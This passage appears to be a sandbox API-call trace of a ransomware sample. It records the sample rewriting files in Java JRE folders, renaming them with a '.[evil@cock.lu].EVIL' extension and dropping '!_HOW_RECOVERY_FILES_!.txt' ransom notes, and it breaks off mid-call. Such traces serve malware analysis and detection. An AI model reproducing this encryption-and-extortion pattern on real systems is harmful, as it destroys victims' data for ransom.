[0094.348] wcscmp (_String1="sRGB.pf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.348] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sRGB.pf") returned 0x0 [0094.348] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf") returned 0x33 [0094.348] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.351] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc48, lpOverlapped=0x0) returned 1 [0094.354] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.354] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.354] _errno () returned 0x84b1160840 [0094.354] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.354] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc60, lpOverlapped=0x0) returned 1 [0094.354] CloseHandle (hObject=0x1a8) returned 1 [0094.354] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.355] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.355] __uncaught_exception () returned 0x84b1160800 [0094.355] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.355] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\srgb.pf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\srgb.pf.[evil@cock.lu].evil")) returned 1 [0094.356] ??_V@YAXPEAX@Z () returned 0x1 [0094.359] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf", dwFileAttributes=0x0) returned 0 [0094.360] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0094.360] FindClose (in: hFindFile=0x84b11dcfc0 | out: hFindFile=0x84b11dcfc0) returned 1 [0094.360] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm") returned 0x2b [0094.360] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.360] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.360] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.361] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0094.361] __uncaught_exception () returned 0x84b1160800 [0094.361] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.362] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.362] wcsstr (_Str="content-types.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.362] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties") returned 64 [0094.362] wcscmp (_String1="content-types.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.362] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="content-types.properties") returned 0x0 [0094.362] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties") returned 0x40 [0094.362] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.364] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x15ac, lpOverlapped=0x0) returned 1 [0094.368] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.368] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.368] _errno () returned 0x84b1160840 [0094.368] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.368] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x15c0, lpOverlapped=0x0) returned 1 [0094.368] CloseHandle (hObject=0x1a4) returned 1 [0094.368] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.369] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.369] __uncaught_exception () returned 0x84b1160800 [0094.369] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.369] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\content-types.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\content-types.properties.[evil@cock.lu].evil")) returned 1 [0094.370] ??_V@YAXPEAX@Z () returned 0x1 [0094.373] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties", dwFileAttributes=0x0) returned 0 [0094.373] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.373] wcsstr (_Str="currency.data", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.374] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data") returned 53 [0094.374] wcscmp (_String1="currency.data", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.374] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="currency.data") returned 0x0 [0094.374] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data") returned 0x35 [0094.374] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.376] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x101a, lpOverlapped=0x0) returned 1 [0094.380] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.380] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.380] _errno () returned 0x84b1160840 [0094.380] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1020, lpOverlapped=0x0) returned 1 [0094.380] CloseHandle (hObject=0x1a4) returned 1 [0094.380] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.380] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.380] __uncaught_exception () returned 0x84b1160800 [0094.380] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.381] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\currency.data"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\currency.data.[evil@cock.lu].evil")) returned 1 [0094.382] ??_V@YAXPEAX@Z () returned 0x1 [0094.388] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data", dwFileAttributes=0x0) returned 0 [0094.389] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.389] wcsstr (_Str="deploy", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.389] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy") returned 46 [0094.389] wcscmp (_String1=".", _String2="deploy") returned -1 [0094.389] wcscmp (_String1="..", _String2="deploy") returned -1 [0094.389] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy") returned 0x2e [0094.389] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy") returned 0x0 [0094.389] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\*" [0094.389] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddb00 [0094.390] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.390] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\.") returned 48 [0094.390] wcscmp (_String1=".", _String2=".") returned 0 [0094.390] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.390] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.390] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\..") returned 49 [0094.390] wcscmp (_String1=".", _String2="..") returned -1 [0094.390] wcscmp (_String1="..", _String2="..") returned 0 [0094.390] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.390] wcsstr (_Str="ffjcext.zip", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.390] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip") returned 58 [0094.390] wcscmp (_String1="ffjcext.zip", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.390] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ffjcext.zip") returned 0x0 [0094.391] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip") returned 0x3a [0094.391] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.394] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x374c, lpOverlapped=0x0) returned 1 [0094.397] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.397] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.397] _errno () returned 0x84b1160840 [0094.397] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.397] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3760, lpOverlapped=0x0) returned 1 [0094.397] CloseHandle (hObject=0x1a8) returned 1 [0094.397] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.398] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.398] __uncaught_exception () returned 0x84b1160800 [0094.398] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.398] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip.[evil@cock.lu].evil")) returned 1 [0094.399] ??_V@YAXPEAX@Z () returned 0x1 [0094.402] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip", dwFileAttributes=0x0) returned 0 [0094.402] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.402] wcsstr (_Str="messages.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.402] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties") returned 66 [0094.403] wcscmp (_String1="messages.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.403] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages.properties") returned 0x0 [0094.403] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties") returned 0x42 [0094.403] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.405] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb2c, lpOverlapped=0x0) returned 1 [0094.408] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.408] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.408] _errno () returned 0x84b1160840 [0094.408] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.408] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb40, lpOverlapped=0x0) returned 1 [0094.408] CloseHandle (hObject=0x1a8) returned 1 [0094.408] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.409] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.409] __uncaught_exception () returned 0x84b1160800 [0094.409] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.409] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages.properties.[evil@cock.lu].evil")) returned 1 [0094.410] ??_V@YAXPEAX@Z () returned 0x1 [0094.414] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties", dwFileAttributes=0x0) returned 0 [0094.414] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.414] wcsstr (_Str="messages_de.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.414] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties") returned 69 [0094.414] wcscmp (_String1="messages_de.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.414] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_de.properties") returned 0x0 [0094.414] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties") returned 0x45 [0094.414] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.416] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcea, lpOverlapped=0x0) returned 1 [0094.420] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.420] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.420] _errno () returned 0x84b1160840 [0094.420] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.420] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0094.420] CloseHandle (hObject=0x1a8) returned 1 [0094.420] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.420] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.420] __uncaught_exception () returned 0x84b1160800 [0094.420] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.421] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties.[evil@cock.lu].evil")) returned 1 [0094.422] ??_V@YAXPEAX@Z () returned 0x1 [0094.426] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties", dwFileAttributes=0x0) returned 0 [0094.426] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.426] wcsstr (_Str="messages_es.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.426] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties") returned 69 [0094.426] wcscmp (_String1="messages_es.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.426] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_es.properties") returned 0x0 [0094.426] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties") returned 0x45 [0094.426] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.428] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe10, lpOverlapped=0x0) returned 1 [0094.432] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.432] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.432] _errno () returned 0x84b1160840 [0094.432] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.432] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0094.432] CloseHandle (hObject=0x1a8) returned 1 [0094.432] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.432] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.432] __uncaught_exception () returned 0x84b1160800 [0094.432] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.433] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties.[evil@cock.lu].evil")) returned 1 [0094.433] ??_V@YAXPEAX@Z () returned 0x1 [0094.437] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties", dwFileAttributes=0x0) returned 0 [0094.437] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.437] wcsstr (_Str="messages_fr.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.437] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties") returned 69 [0094.437] wcscmp (_String1="messages_fr.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.437] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_fr.properties") returned 0x0 [0094.437] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties") returned 0x45 [0094.437] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.440] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd51, lpOverlapped=0x0) returned 1 [0094.443] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.443] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.443] _errno () returned 0x84b1160840 [0094.443] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.444] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x84b0fdd7a0, 